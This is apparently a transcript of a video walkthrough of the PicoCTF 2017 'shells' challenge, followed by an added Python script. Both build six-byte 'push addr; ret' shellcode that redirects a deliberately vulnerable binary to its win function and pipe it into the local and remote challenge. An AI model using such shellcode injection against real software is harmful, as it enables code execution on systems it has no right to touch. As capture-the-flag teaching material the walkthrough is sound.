Hello, YouTube. My name is John Hammond. This is more PicoCTF 2017 Level 2. Normally, I would be moving on to the next challenge in the web category with the Toaster Wars challenges. However, they are currently down at the moment, and I've asked them a lot to fix it. I don't really want to ask again. So we'll stand by on that. So let's move into the Binary Exploitation category. Shellz is the first one, with the Z at the end. However, actually exploring this challenge and the next, I have this significant hunch that shells with an S and 70 points is actually the first challenge that's supposed to come before this one. So I'm going to do that to showcase it to you. The challenge is: "How much can a couple bytes do? Use shells." We're given a binary and a source, and there's the remote-access netcat connection. The hints here are: read about basic shellcode. You don't need a full shell yet, just enough to get the flag. Okay, so let's go ahead and download these files. I will wget them into a folder that I have already created for it. Get the binary and get the source code, etc., so we can see what we're working with. Let's check out the source code. It is written in C. We have some headers that we're including, defining an amount of stuff to, I guess, do something with; we'll see. And there's a function called win that will just call the system command cat out flag.txt. Okay, so that must be what we really want to execute. Let's check out this function vuln. It does something with memory mapping that is allowed to execute, protections to execute, blah, blah, blah. Admittedly, I should learn more about memory mapping and stuff like that. Again, I'm not that good at this kind of stuff, but it will eventually ask for, okay, give me 10 bytes, the amount of stuff defined up top. It will read in that amount. It'll determine if anything was actually returned, and it looks like it will go ahead and try and execute the stuff that it returned, or read in.
So it looks like it is able to just execute code, and again, with that memory map that is executable. So this is a peculiar thing that we sometimes see in CTF challenges, and we'll see in binary exploitation, vulnerability challenges, stuff like that, where the stack or the area of memory that these things are stored in is executable. You'll see techniques called DEP, or Data Execution Prevention, and NX that will try and mitigate that. However, in this binary NX is off, we can assume, obviously, because this memory map is allocated with executable permissions on it. So it says, "Okay, my mother told me to never accept things from strangers. How bad could running a couple bytes be?" Then it will run that vuln function. So we want to figure out how we can run this win function, and the challenge is hinting at shellcode. So if you haven't seen shellcode before, it's amazing and bewildering. It says: in hacking, shellcode is a piece of code used as the payload in the exploitation of a software vulnerability. It's called shellcode because it typically starts a command-line shell from which the attacker can control the compromised machine, but it can do just about anything, whatever machine code that you write, et cetera, because shellcode is written in machine code. So that is assembly and instructions and opcodes and everything that we saw in the previous reverse engineering challenges. Now we'll put it to use in actually exploiting a binary, or like hacking a program. So we can go ahead and find shellcode on the internet. A really good location that I found is shell-storm, and I'll reference that in the next video, where we can just get a ton of cool shellcode. But pwntools will actually let us try and develop our own shellcode. I want to showcase the documentation on that because it will give us an assembly platform where we can go ahead and craft our own shellcode, aptly called shellcraft. So that's pretty neat. Will it give me documentation? Yes, great.
If you don't have pwntools, sudo apt or sudo pip install it; it's fantastic. Shellcraft is down here at the bottom. I hope to do a series on shellcraft sometime soon. But it essentially breaks down into submodules based off architecture. In this case, if we want to check the binary, we can see what we're working with. It is just an Intel 386 and running on Linux. So we can reach that if we want to, and we can have it do specific things like cat a file or try those other connections, etc., etc., etc. And we can do that all just fine. And we can build it all with an assembly function that will, as a nice utility in pwntools, go ahead and give us the assembly for that thing. It will assemble whatever code we write in assembly into real opcodes. So if we wanted to do something simple, like call a function, in this case win that we saw in the source code, that's really what we want right now before we jump into trying to cat stuff and pop open new shells. We can just piece together some assembly code and run it. So let's try that. I'm going to go ahead and create a new shell up here. I'll use Python. And on the other side, I want to check out the symbols in this binary. So I'm going to use readelf -s to just be able to showcase the symbols, and we can see we have some information where the function that we want here, win, is stored local to the binary at this hexadecimal address, 08048540. So I could copy that if I wanted to. And then in Python, let's import the pwn module, and then let's write what will essentially be our own assembly that we're trying to do. Let's push that memory address onto the stack and then let's return, so that we will just go to that location, or call that function. Essentially, we'll just pop over there and move to this location, essentially calling the win function. Let's go ahead and compile that, not compile it, but put it in assembly opcodes. And you can see that pwntools will give it to us just like that.
So if we wanted to, we could go ahead and print this out in Python, print that string. And I use Python to print it out so we can properly handle those raw bytes. You can see them on the terminal; I wouldn't be able to print those characters otherwise. So once we have that on standard output, we can go ahead and pass that to our shells binary. We'll just pipe in that input because, if you remember reading the source code, that shells program will just want to run bytes. But it can't actually run those things if you didn't give it anything; it's just waiting for input. So let's go ahead and get that stuff, that assembly that we just compiled, those opcodes, that machine code, that shellcode, put it on standard output, pipe it in. And once we pass it to the program, you can see it's trying to run that system command. Just as the win function explained: /bin/cat flag.txt, no such file or directory. OK, looks like we've got it doing what we want it to do on our local thing. We just don't have a file flag.txt that we could actually have it display. If we faked something, it totally could do that for us, whatever. But let's go ahead and pass it to the real thing. Let's go ahead and take it with that remote netcat command, running the program just remotely. Let's go ahead and pump that to our input, and we get the flag just like that. So that is what we're working with here. We could, if we wanted to, tail that to get just the flag, write a simple get-flag script for that, just throw it in a little binary or bash script. That doesn't explain the whole process we went through with readelf and generating that shellcode with pwntools. So we could write a pwntools script to connect to it and generate that shellcode on the fly if we particularly wanted to. But I don't want to get that far into it right now.
However, I hope that was a good overview of our potential for shellcode and just showing how we can do what we want in assembly and bring that to opcodes by using the pwntools library. So that is an awesome toolkit, and we'll get into doing other cool things in that next challenge. Do I have the flag actually in my front? No, let's go ahead and submit it in that other challenge that I think really does come after this one for some reason, though the point value is different, where we aren't able to use that win function. We've just got to do something else like cat the flag, etc., etc. Quick shout-out to the people that support me on Patreon. Thank you guys so much. One dollar or more on Patreon will give you a special shout-out just like this at the end of our video. Five dollars or more on Patreon will give you early access to everything released on YouTube. If you did like this video, please do like, comment and subscribe. Join our Discord server, link in the description. It's a cool community of CTF players, programmers and hackers. Hang out with me and other cool people, and I would love to see you guys on Patreon and in the next video. See ya.
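The push-and-return shellcode the video assembles with pwntools, hand-encoded as an added example (this is not code from the video or from the pwntools project). It encodes the two i386 instructions `push <addr>; ret` byte by byte, checks that the result fits the 10-byte read the challenge source allows, decodes the bytes back to confirm they say what we think, and, only if pwntools happens to be installed, cross-checks against `asm()` the way the video uses it. The address `0x08048540` is the one `readelf -s` showed for `win` in the video's binary; for any other build of the binary it would have to be looked up again.

```python
"""Hand-encode the i386 'push addr; ret' shellcode from the video.

Added example, not the video's or pwntools' own code. It needs only the
standard library so it runs offline; pwntools is used only as an optional
cross-check when it is present.
"""
import struct
import sys
from typing import Optional

MAX_BYTES = 10            # the amount the vuln function reads, per the challenge source
WIN_ADDR = 0x08048540     # address of win from readelf -s in the video

PUSH_IMM32 = b"\x68"      # i386 opcode: push imm32 (4-byte little-endian operand follows)
RET = b"\xc3"             # i386 opcode: ret (pops the top of the stack into EIP)


def push_ret_shellcode(addr: int) -> bytes:
    """Return the 6-byte encoding of 'push addr; ret'.

    ret takes its target from the top of the stack, so pushing addr first
    makes execution continue at addr, i.e. it acts like a jump to win.
    """
    if not 0 <= addr <= 0xFFFFFFFF:
        raise ValueError("address must fit in 32 bits on i386")
    return PUSH_IMM32 + struct.pack("<I", addr) + RET


def fits_in_read(shellcode: bytes, limit: int = MAX_BYTES) -> bool:
    """The program reads only `limit` bytes; anything longer is silently cut off."""
    return len(shellcode) <= limit


def decode_push_ret(shellcode: bytes) -> int:
    """Tiny decoder for exactly this pattern: recover the pushed address.

    A cheap sanity check on a payload before it is piped anywhere.
    """
    if len(shellcode) != 6 or shellcode[:1] != PUSH_IMM32 or shellcode[5:] != RET:
        raise ValueError("not a 'push imm32; ret' sequence")
    return struct.unpack("<I", shellcode[1:5])[0]


def cross_check_with_pwntools(addr: int) -> Optional[bool]:
    """Confirm pwntools' asm() (as used in the video) agrees with our bytes.

    Returns None when pwntools is not installed so the example still runs offline.
    """
    try:
        from pwn import asm
    except ImportError:
        return None
    return asm(f"push {addr:#x}; ret", arch="i386") == push_ret_shellcode(addr)


if __name__ == "__main__":
    sc = push_ret_shellcode(WIN_ADDR)
    if "--raw" in sys.argv:
        # Emit only the raw bytes, so the script can be piped into the binary
        # the same way the video pipes Python's output:  python3 x.py --raw | ./shells
        sys.stdout.buffer.write(sc)
    else:
        print("shellcode:", sc.hex(), f"({len(sc)} bytes, fits={fits_in_read(sc)})")
        print("decodes back to:", hex(decode_push_ret(sc)))
        print("pwntools agrees:", cross_check_with_pwntools(WIN_ADDR))
```

The whole payload is six bytes, which is why the challenge's 10-byte limit is no obstacle here; the length check matters more for the follow-on challenge the video mentions, where `win` is gone and the shellcode has to do the work itself and still fit in the read.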